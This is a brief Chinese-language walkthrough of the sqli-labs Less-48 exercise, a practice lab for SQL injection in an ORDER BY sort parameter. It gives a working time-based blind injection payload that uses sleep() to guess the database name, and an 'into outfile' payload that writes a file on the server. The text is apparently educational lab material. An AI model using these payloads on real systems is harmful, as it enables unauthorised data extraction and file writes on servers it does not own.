Less-48
本关与less-46的区别在于报错注入不能使用,不进行错误回显,其他的方法我们依旧是可以使用的。
可以利用sort=rand(true/false)进行判断。

and延时注入
http://192.168.11.136/sqli-labs/Less-48?sort=1 and (if (ascii(substr(database(),1,1))=115,0,sleep(5)))
同时,我们照样可以进行into outfile注入:
http://192.168.11.136/sqli-labs/Less-48?sort=1 into outfile "路径"
这里就不进行贴图演示了。